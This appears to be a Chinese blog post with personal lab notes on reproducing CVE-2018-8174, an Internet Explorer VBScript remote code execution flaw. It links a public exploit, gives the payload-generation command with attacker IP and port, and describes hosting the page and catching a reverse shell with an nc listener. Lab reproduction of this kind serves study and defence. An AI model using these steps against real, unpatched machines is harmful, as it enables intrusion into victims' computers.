漏洞介绍:CVE-2018-8174这个漏洞是针对IE浏览器的一个远程代码执行漏洞,是Windows VBScript Engine 代码执行漏洞,由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。

受影响产品:Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers

复现过程

环境:kali[192.168.86.132]  + (win7+IE)[192.168.86.130]

step1、去Github下载exp到kali上

(下载地址:https://github.com/Sch01ar/CVE-2018-8174_EXP

进入文件目录

然后生成payload

python CVE-2018-8174.py -u payload的url -o rtf文件的名字 -i ip地址 -p 端口

然后就能看到生成了两个文件:一个HTML、一个rtf文件

将HTML文件复制到nginx的网站

step2、关闭apache服务、重启Nginx(现在的kali是自带安装好了apache和nginx了)

step3、启动nc监听刚刚设置好的端口,等待对方打开网站

step4、用win7的IE浏览器打开url地址

IE浏览器打开网页,虽然没有正常显示这个页面,但是已经攻击成功了,攻击机上没有发觉什么异样情况

step5、返回kali看看,已经反弹一个shell了

over!!!(今天复现了一个漏洞,写了个笔记发在这里啦!)

最新文章

  1. CSS3-border-radius的兼容写法大全
  2. nodejs express template (模版)的使用 (ejs + express)
  3. 软件测试Lab2
  4. [C和指针]第二部分
  5. SqlServer数据库正在还原的解决办法
  6. 我对GIT的理解
  7. 编程实现linux下的shell
  8. Spring事务Transaction配置的五种注入方式详解
  9. alibaba的COBAR真是强大.
  10. 获取字符宽度:并非自适应。coretext去计算
  11. PL/SQL Developer使用技巧以及快捷键设置
  12. Java入门——(5)Java API
  13. Node做中转服务器,转发接口
  14. Head First设计模式之生成器模式
  15. [bzoj2594][Wc2006]水管局长数据加强版 (lct)
  16. QuickBI助你成为分析师——计算字段功能
  17. jsp填坑:找不到属性
  18. K8S Calico
  19. 4939-Agent2-洛谷
  20. js获取当前城市名

热门文章

  1. React中实现keepalive组件缓存效果
  2. Matplotlib 绘制折线图
  3. py之循环,函数
  4. Java实现BP神经网络MNIST手写数字识别
  5. vulnhub靶场之DIGITALWORLD.LOCAL: VENGEANCE
  6. CH32芯片_EVT工程配置方法说明
  7. 在 Asp.Net Core 中什么是认证和授权
  8. 【MRTK】HoloLens开发基础项目设置
  9. Linux之ssh远程连接
  10. Quartz与Topshelf结合实现window定时服务